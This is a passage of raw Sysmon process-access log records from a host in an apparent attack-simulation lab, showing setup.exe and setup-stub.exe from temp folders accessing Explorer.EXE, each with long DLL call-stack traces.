ELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|